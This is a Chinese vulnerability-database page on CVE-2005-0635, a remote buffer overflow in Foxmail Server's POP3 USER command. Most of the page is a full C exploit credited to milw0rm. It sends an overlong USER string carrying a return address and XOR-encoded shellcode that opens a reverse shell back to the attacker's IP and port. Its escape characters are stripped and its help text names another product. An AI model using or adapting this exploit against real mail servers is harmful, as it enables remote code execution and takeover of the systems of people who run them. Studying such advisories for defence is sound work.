Foxmail Server “USER”命令处理多个远程缓冲区溢出漏洞
| 漏洞ID | 1108498 | 漏洞类型 | 缓冲区溢出 |
| 发布时间 | 2005-03-02 | 更新时间 | 2005-10-20 |
![图片[1]-Foxmail Server “USER”命令处理多个远程缓冲区溢出漏洞-安全小百科](https://p0.ssl.qhimg.com/dr/29_50_100/t01bbbb9ac447dabd6a.png) CVE编号
|
CVE-2005-0635 |
![图片[2]-Foxmail Server “USER”命令处理多个远程缓冲区溢出漏洞-安全小百科](https://p0.ssl.qhimg.com/dr/29_150_100/t01cd54df57948e31ea.png) CNNVD-ID
|
CNNVD-200505-589 |
| 漏洞平台 | Windows | CVSS评分 | 10.0 |
|漏洞来源
|漏洞详情
FoxmailServer是Windows和linux下都可以使用的邮件服务程序。FoxmailServer对特定命令的参数处理存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞在服务器上执行任意指令。
|漏洞EXP
#include <winsock.h>
#include <windows.h>
#include <stdio.h>
#include <conio.h>
#pragma comment (lib,"ws2_32")
#define PORT_OFFSET 118
#define IP_OFFSET 111
char Shellcode[] = "xEBx10x5Bx4Bx33xC9x66xB9x25x01x80x34x0Bx99xE2xFA"
"xEBx05xE8xEBxFFxFFxFF"
"x70x62x99x99x99xC6xFDx38xA9x99x99x99x12xD9x95x12"
"xE9x85x34x12xF1x91x12x6ExF3x9DxC0x71x02x99x99x99"
"x7Bx60xF1xAAxABx99x99xF1xEExEAxABxC6xCDx66x8Fx12"
"x71xF3x9DxC0x71x1Bx99x99x99x7Bx60x18x75x09x98x99"
"x99xCDxF1x98x98x99x99x66xCFx89xC9xC9xC9xC9xD9xC9"
"xD9xC9x66xCFx8Dx12x41xF1xE6x99x99x98xF1x9Bx99x99"
"xACx12x55xF3x89xC8xCAx66xCFx81x1Cx59xECxD3xF1xFA"
"xF4xFDx99x10xFFxA9x1Ax75xCDx14xA5xBDxF3x8CxC0x32"
"x7Bx64x5FxDDxBDx89xDDx67xDDxBDxA4x10xC5xBDxD1x10"
"xC5xBDxD5x10xC5xBDxC9x14xDDxBDx89xCDxC9xC8xC8xC8"
"xF3x98xC8xC8x66xEFxA9xC8x66xCFx9Dx12x55xF3x66x66"
"xA8x66xCFx91xCAx66xCFx85x66xCFx95xC8xCFx12xDCxA5"
"x12xCDxB1xE1x9Ax4CxCBx12xEBxB9x9Ax6CxAAx50xD0xD8"
"x34x9Ax5CxAAx42x96x27x89xA3x4FxEDx91x58x52x94x9A"
"x43xD9x72x68xA2x86xECx7ExC3x12xC3xBDx9Ax44xFFx12"
"x95xD2x12xC3x85x9Ax44x12x9Dx12x9Ax5Cx32xC7xC0x5A"
"x71x99x66x66x66x17xD7x97x75xEBx67x2Ax8Fx34x40x9C"
"x57xE7x41x7BxEAx52x74x65xA2x40x90x6Cx34x75x60x33"
"xF9x7ExE0x5FxE0";
char szUser[] = "user 1231231231231234567890abcdefghijklmnopqrstuvwxyz1234567890a"
"bcdefghijklmnopqrstuvwxyz1234567890abcdefghijklmnopqrstuvwxyz123"
"4567890abcdefghijklmnopqrstuvwxyz1234567890abcdefghijkklmnopqrst"
"uvwxyz1234567890abcdefghijkklmnopqrstuvwxyz1234567890abcdAAAAijk"
"lmnopqrstuvwxyz1234567890abcdefghijklmnopqrstuvwxyz1234567890abc"
"defghijklmnopqrstuvwxyz1234567890abcdefghijklmnopqrstuvwxyz12345"
"67890abcdefghijklmnopqrstuvwxyz1234567890abcdefghijklmnopqrstuvw"
"xyz1234567890abcdefghijklmnopqrstuvwxyz1234567890abcdefghijklmno"
"pqrstuvwxyz1234567890abcdefghijklmnopqrstuvwxyz1234567890abcdefg"
"hijklmnopqrstuvwxyz1234567890abcdefghijklmnopqrstuvwxyz123456789"
"0abcdefghijklmnopqrstuvwxyz1234567890abcdefghijklmnopqrstuvwxyz1"
"234567890abcdefghijklmnopqrstuvwxyz1234567890abcdefghijklmnopqrs"
"tuvwxyz1234567890abcdefghijklmnopqrstuvwxyz1234567890abcdefghijk"
"lmnopqrstuvwxyz1234567890abcdefghijklmnopqrstuvwxyz1234567890abc"
"defghijklmnopqrstuvwxyz1234567890abcdefghijklmnopqrstuvwxyz12345"
"67890abcdefghijklmnopqrstuvwxyz1234567890abcdefghijklmnopqrstuvw"
"xyz1234567890abcdefghijklmnopqrstuvwxyz1234567890abcdefghijklmno"
"pqrstuvwxyz1234567890abcdefghijklmnopqrstuvwxyz1234567890abcdefg"
"hijklmnopqrstuvwxyzrn";
unsigned char szPass[] = "pass siglosrn";
void help(char *program)
{
printf ("========================================================rn");
printf ("Aerofox Mail Server 1.1.0.1 POP3 Temp Dir Stack Overflowrn");
printf ("========================================================rnrn");
printf ("Usage: %s <Host> <Your IP> <Your port>rn", program);
printf ("e.g.:rn");
printf (" %s 127.0.0.1 202.119.9.42 8111rn", program);
printf ("rn The ret address is 0x7ffa1571.rn");
exit(0);
}
SOCKET Connect(char *u_host ,unsigned short u_port)
{
WSADATA wsaData;
SOCKET sock;
struct hostent *r;
struct sockaddr_in r_addr;
int timeout = 1000;
if(WSAStartup(0x0101,&wsaData) != 0)
{
printf("error starting winsock..");
return -1;
}
if((r=gethostbyname(u_host))== NULL)
{
return -1 ;
}
if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))== INVALID_SOCKET)
{
return -1 ;
}
r_addr.sin_family=AF_INET;
r_addr.sin_port=htons(u_port);
r_addr.sin_addr=*((struct in_addr*)r->h_addr);
if(connect(sock,(struct sockaddr *)&r_addr,sizeof(r_addr))==SOCKET_ERROR)
{
printf("Can't connectn");
exit(-1);
}
setsockopt(sock, SOL_SOCKET, SO_RCVTIMEO, (char*)&timeout,sizeof(timeout));
return(sock);
}
void Disconnect(SOCKET s)
{
closesocket(s);
WSACleanup();
}
void tr(SOCKET s)
{
char buff[1500];
memset(buff, 0, sizeof(buff));
recv(s, buff, sizeof(buff), 0);
printf("%srn",buff);
}
void SlowSend(SOCKET s, char *buf, int p)
{
//send(s, buf, sizeof(buf),0);
//send(s, "rn", 2,0);
for(unsigned int i = 0; i < strlen(buf); i++)
{
Sleep(p);
printf("%c", buf[i]);
send(s, (char*)&(buf[i]), 1, 0);
}
}
void main(int argc, char *argv[])
{
/*_asm{
mov eax,90909091h
dec eax
a: dec ebx
cmp [ebx], eax
jnz a
push ebx
ret
}*/
if(argc != 4)
help(argv[0]);
unsigned short port;
unsigned long ip;
port = htons(atoi(argv[3]))^(USHORT)0x9999;
ip = inet_addr(argv[2])^(ULONG)0x99999999;
memcpy(&Shellcode[PORT_OFFSET], &port, 2);
memcpy(&Shellcode[IP_OFFSET], &ip, 4);
SOCKET s = Connect(argv[1], 110);
tr(s);
memcpy(szUser + 244, "xCCx90xEBx04x71x15xFAx7F", 8);
memcpy(szUser + 244 + 8, "xB8x91x90x90x90x48x4Bx39x03x75xFBx53xC3x90x90x90x90", 17);
memcpy(szUser + 244 + 8 + 17, Shellcode, sizeof(Shellcode) - 1);
SlowSend(s, (char*)szUser, 1);
getch();
tr(s);
SlowSend(s, (char*)szPass, 100);
tr(s);
Disconnect(s);
return;
}
// milw0rm.com [2005-03-02]
|参考资料
来源:BID
名称:12711
链接:http://www.securityfocus.com/bid/12711
来源:BUGTRAQ
名称:20050302Foxmailserver”USER”commandMultipleremotebufferoverflow
链接:http://www.securityfocus.com/archive/1/391960
来源:SECTRACK
名称:1013356
链接:http://securitytracker.com/id?1013356
来源:SECUNIA
名称:14145
链接:http://secunia.com/advisories/14145
相关推荐: CiscoSecure 访问控制服务器(ACS)默认配置授权问题漏洞。
CiscoSecure 访问控制服务器(ACS)默认配置授权问题漏洞。 漏洞ID 1206957 漏洞类型 其他 发布时间 1999-08-19 更新时间 1999-08-19 CVE编号 CVE-1999-0734 CNNVD-ID CNNVD-199908…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666